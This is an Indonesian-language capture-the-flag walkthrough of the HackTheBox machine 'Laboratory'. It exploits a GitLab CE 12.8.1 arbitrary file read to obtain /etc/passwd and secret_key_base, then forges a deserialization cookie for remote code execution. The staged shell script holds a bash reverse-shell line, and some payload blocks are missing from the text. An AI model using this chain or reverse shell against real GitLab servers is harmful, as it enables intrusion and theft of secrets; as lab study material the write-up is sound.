Gitlab Laboratory
Author : anonputraid
Last updated
Was this helpful?
Author : anonputraid
Last updated
Was this helpful?
Berikut Adalah Informasi Mengenai Cara Menyelesaikan Box Meshine Laboratory Pada Hackthebox , Tujuan Catatan Informasi Seperti Ini Agar Bisa Terus Mengingat Dan Mengulang Apa Yang Telah Dipelajari Sebelum Nya!
Output :
Scan Nmap Menunjukan Port 80 Terbuka , Dan Kita Mendapatkan Domain Laboratory.htb
Anda Tidak Akan Menemukan Hal Menarik Apapun Pada Website Laboratory.htb
, Lalu Baca Lebih Teliti DIsana Kita Menemukan Bahwa Mereka Menggunakan Git, Anda Akan Menemukan Domain git.laboratory.htb
Mari pindah ke sub domain
Lakukan Hal Berikut :
Disana Anda Bisa Membuat Account , Mari kita coba membuat Akun Anda Dan Untuk Bagian Email Mereka Menggunakan Domain <youname>@
Laboratory.htb
Coba Anda Search Referensi Mengenai Kerentanan Gitlab Comunity Edition 12.8.1
Anda Akan Mendapat Kan Bahwa Versi Tersebut Memiliki Kerentanan File arbitrer Yang Bisa dibaca melalui UploadsRewriter saat memindahkan dan mengeluarkan Referensi :
Langkah-langkah untuk Mengexploitasi Kerentanan Ini :
Buat Dua Project Di Domain git.laboratory.htb
Jika Sudah Lalu Klick Bagian Issue Project Dan Tambahkan masalah dengan deskripsi berikut:
Dipojok kiri Setelah Anda Menyimpan Issue Tersebut Ada Tombol Move , Lalu Pindahkan Issue ke Project kedua
File Tersebut Akan Berubah Menjadi File Passwd
Dampak Yang AKan Terjadi Adalah Memungkinkan penyerang membaca file sewenang-wenang di server, termasuk token, data pribadi, konfigurasi, dll
Ini memungkinkan untuk mengubahnya menjadi RCE karena ini dapat dilakukan Dengan mengambil secret_key_base
from /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
menggunakan file arbitrary read dan kemudian menggunakan experimentation_subject_id
cookie dengan muatan Marshalled.
Lakukan Hal Berikut :
Setelah Itu Untuk Melakukan Serangan RCE Kita Harus Menginstal Gitlab Secara Lokal:
Berikut Langkah-Langkah Untuk Menginstal Gitlab :
Lalu Lakukan Perintah Berikut sudo
dpkg -i gitlab-ce_12.8.10-ce.0_amd64.deb
Lakukan sudo gitlab-ctl reconfigure
Lakukan sudo nano /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
Ubah Bagian secret_key_base , Menjadi Secret_key_base Yang Kalian Dapatkan Di Domain git.laboratory.htb
Run: sudo gitlab-rails console
Kita Harus Menghasilkan Cookie Dengan Payload :
Buat lah File shell.sh
Didalam Nya Format: bash -i >& /dev/tcp//1337 0>&1
Lalu Setelah Itu Lakukan Ini : sudo python3 -m http.server 8000
Berikut Adalah Payload Gitlab :
Lalu Salin Bagian Payload Cookie Dan Tambahkan DIbagian Berikut :
Jika Sudah Berhasil Login Kunjungi Halaman Berikut : Anda Akan Mendapat Kan Versi Git Yang Mereka Gunakan : GitLab Community Edition 12.8.1
Download Disini :